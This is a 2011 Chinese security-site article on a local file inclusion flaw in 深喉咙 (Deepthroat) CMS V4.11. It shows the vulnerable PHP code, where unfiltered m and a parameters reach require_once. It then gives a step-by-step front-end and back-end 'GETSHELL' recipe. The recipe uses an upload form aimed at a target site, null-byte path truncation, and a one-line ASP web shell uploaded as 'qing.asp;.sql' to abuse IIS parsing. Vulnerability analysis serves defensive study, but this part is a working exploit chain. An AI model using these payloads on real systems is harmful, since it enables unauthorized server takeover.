首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
深喉咙企业网站生成系统V4.11 本地包含漏洞利用
来源:vfocus.net 作者:村长 发布时间:2011-04-25  

高效快速和强大的企业网站和综合信息网站。

深喉咙CMS全称为深喉咙企业网站生成系统,曾用名:深喉咙网站管理系统、深喉咙企业网站系统、SHLCMS、Deepthroat等

漏洞分析:

/index.php  源码

/*--------------*/
/*省略不必要代码*/
/*--------------*/
 
$_REQUEST = cleanArrayForMysql($_REQUEST);
$_GET     = cleanArrayForMysql($_GET);
$_POST    = cleanArrayForMysql($_POST);
$request  = $_REQUEST;
 
//上面传参都进行字符串转义,对于 ../ 没有任何影响
 
/*--------------*/
/*省略不必要代码*/
/*--------------*/
 
$request['m']                =        !isset($request['m'])?'':$request['m'];                   //m没有过滤
$params['model']        =        empty($request['m'])?$menu_arr['type']:$request['m'];
$request['a']                =        !isset($request['a'])?'':$request['a'];                   //a没有过滤
$params['action']        =        empty($request['a'])?'index':$request['a'];
 
 
/*--------------*/
/*省略不必要代码*/
/*--------------*/
 
function layout_part($style='')
{
        global $params,$request;
       
        //如果本次升级影响了parts内sql的执行, 请手动注释destorydb函数体代码,切记不要删除
        destorydb();
       
        if(!empty($style)) $style = '_'.$style;
        $part_path=ABSPATH.'/skins/'.STYLENAME.'/parts/'.$params['model'].'_'.$params['action'].$style.'.php';       //含m和a参数的路径
        $content_part_path=ABSPATH.'/content/'.$params['model'].'/parts_'.$params['action'].'.php';                  //含m和a参数的路径
        if(is_file($part_path))
                require_once($part_path);            //包含漏洞出现   
  
        elseif(is_file($content_part_path))
                require_once($content_part_path);    //包含漏洞出现 
        else  
                echo $part_path;
                echo $content_part_path;
                echo '<span style="color:RED"><strong>您当前选择的信息所在的分类栏目或频道可能已经被删除或不存在,请检查一下,该信息所在的栏目情况以及栏目是
 
否存在!</strong></span>';
       
        // 如果本次升级影响了parts内sql的执行, 请手动注释如下代码recoverdb函数体代码,切记不要删除
        recoverdb();
       
        isComments();
}

漏洞利用(前台 GETSHELL):

IIS或者某些apache版本下php文件系统可以进行路径截断,例如://///////////////////////////////// 或则%00

1.先上传PHP恶意代码的图片格式文件,复制上传源码 qing.html:

<form id="frmUpload" enctype="multipart/form-data"
action="http://www.hackqing.com/editor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

.假设得到图片路径 /upload/Media/qing.gif  (利用的是FCK的,测试上传变"."为"_",FCK的不能直接上传为诸如1.asp;.jpg的文件的)

3.直接输入地址:/Article/UploadFiles/201104/20110422101239144.gif%00

或则 输入http://www.hackqing.com/?m=../upload/Me ... ///////////////////(若干)

 

嗯,再给个后台拿SHELL的方法吧,方面给那些不能包含,能进后台的朋友说下


后台 GETSHELL:


依次点击 =》数据库管理=》数据库恢复=》浏览上传 

上传文件qing.asp;.sql  内容为  <%Y=request("qing")%> <%execute(Y)%>

得到地址http://www.hackqing.com/temp/data/qing.asp;.sql     (利用IIS的解析漏洞,就是SHELL了)


作者 : 村长


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·网趣网站管理系统上传漏洞利用
·阿曼达企业网站系统 cookie 注入
·英雄宽频WEB站任意下载0DAY漏洞
·色影空间摄影管理系统4.0个人版
·PHPCMS 2007 sp6 后台GETSHELL
·DiscuzX1.5 门户管理权限SQL注入
·PHP代码执行漏洞参考资料总结
·睿智企业网络管理系统 3.7.7 后
·phpstcms (STCMS音乐系统) 绕过
·烈火文章后台管理系统V2.1 0day
·Dcore(轻型CMS系统) 1.0 注入、
·简单文章管理系统 cookie注入漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved